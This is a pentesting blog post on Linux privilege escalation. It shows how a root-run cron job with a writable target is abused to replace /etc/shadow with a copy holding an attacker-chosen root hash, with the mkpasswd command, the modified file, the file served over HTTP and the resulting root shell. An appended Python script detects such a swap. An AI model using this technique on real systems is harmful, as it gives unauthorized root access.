Day 40: Privilege Escalation (Linux) by Modifying Shadow File for the Easy Win
Feb 8, 2019
Scenario
You can abuse a cron job or script running as root that lets you write somewhere and control what is written. You can do a lot from there (add your own SSH key, add your own user, backdoor code, etc.), but one of my quick and easy favourites is to replace the shadow file with a modified copy in which I set the root password.
Original File
root:$6$RIgrVboA$HDaB29xvtkw6U/Mzq4qOHH2KHB1kIR0ezFyjL75DszasVFwznrsWcc1Tu5E2K4FA7/Nv8oje0c.bljjnn6FMF1:17673:0:99999:7:::
daemon:*:17647:0:99999:7:::
bin:*:17647:0:99999:7:::
sys:*:17647:0:99999:7:::
sync:*:17647:0:99999:7:::
games:*:17647:0:99999:7:::
Generate a new Shadow Hash
root@kali:~/# mkpasswd -m sha-512 -S saltsalt -s
Password: pwned123
$6$saltsalt$HOC6AvLVkxCTYnJ5Tc78.CYF/KdcBDmheMbOGQTqiMUZhdKof7eXjN9/6I3w8smybsEQEaz5Vh8aoGGs71hf20
Modified File
root:$6$saltsalt$HOC6AvLVkxCTYnJ5Tc78.CYF/KdcBDmheMbOGQTqiMUZhdKof7eXjN9/6I3w8smybsEQEaz5Vh8aoGGs71hf20:17673:0:99999:7:::
daemon:*:17647:0:99999:7:::
bin:*:17647:0:99999:7:::
sys:*:17647:0:99999:7:::
sync:*:17647:0:99999:7:::
games:*:17647:0:99999:7:::
Now Write the File via Vulnerability and Profit
root@kali:~/# python -m SimpleHTTPServer 8080
Serving HTTP on 0.0.0.0 port 8080 ...
10.10.10.150 - - [08/Feb/2019 03:27:11] "GET /shadow HTTP/1.1" 200
Easy Root
daisy@vulnerable:~/# su root
Password: pwned123
root@vulnerable:/# id
uid=0(root) gid=0(root) groups=0(root)
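As an added example (not part of the original post), the following Python script shows how a defender can catch exactly this kind of swap: it diffs a baseline copy of /etc/shadow against the current one and flags entries whose hash changed while the third field (days since the last password change) stayed the same, which is what a direct overwrite looks like, since passwd(1) updates that counter when it sets a new hash. The two sample snapshots are constructed from the file listings above.

```python
"""Diff two /etc/shadow snapshots and flag a swapped password hash.

Example added to this post (not the author's code). Nothing here needs root.
"""
from dataclasses import dataclass

# Constructed sample snapshots, copied from the two listings in the post.
BASELINE_SHADOW = """\
root:$6$RIgrVboA$HDaB29xvtkw6U/Mzq4qOHH2KHB1kIR0ezFyjL75DszasVFwznrsWcc1Tu5E2K4FA7/Nv8oje0c.bljjnn6FMF1:17673:0:99999:7:::
daemon:*:17647:0:99999:7:::
"""
TAMPERED_SHADOW = """\
root:$6$saltsalt$HOC6AvLVkxCTYnJ5Tc78.CYF/KdcBDmheMbOGQTqiMUZhdKof7eXjN9/6I3w8smybsEQEaz5Vh8aoGGs71hf20:17673:0:99999:7:::
daemon:*:17647:0:99999:7:::
"""

@dataclass
class ShadowEntry:
    user: str
    pw_hash: str
    lastchg: str   # days since 1970-01-01 of the last password change
    policy: list   # min/max/warn/inactive/expire/reserved, kept verbatim

def parse_shadow(text: str) -> dict:
    """Parse shadow(5) lines into a {user: ShadowEntry} map, enforcing 9 fields."""
    entries = {}
    for lineno, line in enumerate(text.splitlines(), 1):
        if not line.strip():
            continue
        parts = line.split(":")
        if len(parts) != 9:
            raise ValueError(f"line {lineno}: expected 9 fields, got {len(parts)}")
        entries[parts[0]] = ShadowEntry(parts[0], parts[1], parts[2], parts[3:])
    return entries

def find_suspicious_changes(baseline: str, current: str) -> list:
    """Return (user, reason) pairs for accounts whose entry changed between snapshots."""
    before, after = parse_shadow(baseline), parse_shadow(current)
    findings = []
    for user, new in after.items():
        old = before.get(user)
        if old is None:
            findings.append((user, "account added"))
        elif new.pw_hash != old.pw_hash and new.lastchg == old.lastchg:
            findings.append((user, "hash changed but last-change day unchanged"))
        elif new.pw_hash != old.pw_hash:
            findings.append((user, "hash changed"))
    findings += [(user, "account removed") for user in before.keys() - after.keys()]
    return findings
```

Running find_suspicious_changes(BASELINE_SHADOW, TAMPERED_SHADOW) reports only root, with the hash changed and the last-change day still 17673; a file integrity monitor or a periodic cron job comparing against a trusted copy gives the same signal on a live host.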